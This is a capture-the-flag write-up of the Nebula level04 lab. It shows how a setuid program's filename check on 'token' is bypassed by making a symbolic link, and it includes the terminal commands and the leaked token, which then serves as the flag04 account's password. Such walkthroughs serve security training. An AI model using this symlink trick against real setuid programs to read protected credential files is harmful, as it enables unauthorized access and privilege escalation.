"Bypassed restriction
Nebula 04 Agenda: “This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it :)”
After code review we can note that strstr makes check that filename which one we passed as input doesn’t contain substring “token” or as result you’ll get “EXIT_FAILURE” status. As we have no permissions to rename/copy/move that token, to bypass restriction we’ll use symbolic link (ln -s).
1 level04@nebula:~$ cd /home/flag04
2 level04@nebula:/home/flag04$ ls -la
3 total 13
4 drwxr-x--- 2 flag04 level04 93 2011-11-20 21:52 .
5 drwxr-xr-x 1 root root 80 2012-08-27 07:18 ..
6 -rw-r--r-- 1 flag04 flag04 220 2011-05-18 02:54 .bash_logout
7 -rw-r--r-- 1 flag04 flag04 3353 2011-05-18 02:54 .bashrc
8 -rwsr-x--- 1 flag04 level04 7428 2011-11-20 21:52 flag04
9 -rw-r--r-- 1 flag04 flag04 675 2011-05-18 02:54 .profile
10 -rw------- 1 flag04 flag04 37 2011-11-20 21:52 token
11
12 level04@nebula:/home/flag04$ mkdir /tmp/level04
13 level04@nebula:/home/flag04$ ln -s /home/flag04/token /tmp/level04/flag
14 level04@nebula:/home/flag04$ ./flag04 /tmp/level04/flag
15
16 06508b5e-8909-4f38-b630-fdb148a848a2And finally, we can use the hash at line 16 as a passphrase for “flag04” user. After obtaining the access you should know what to do =)
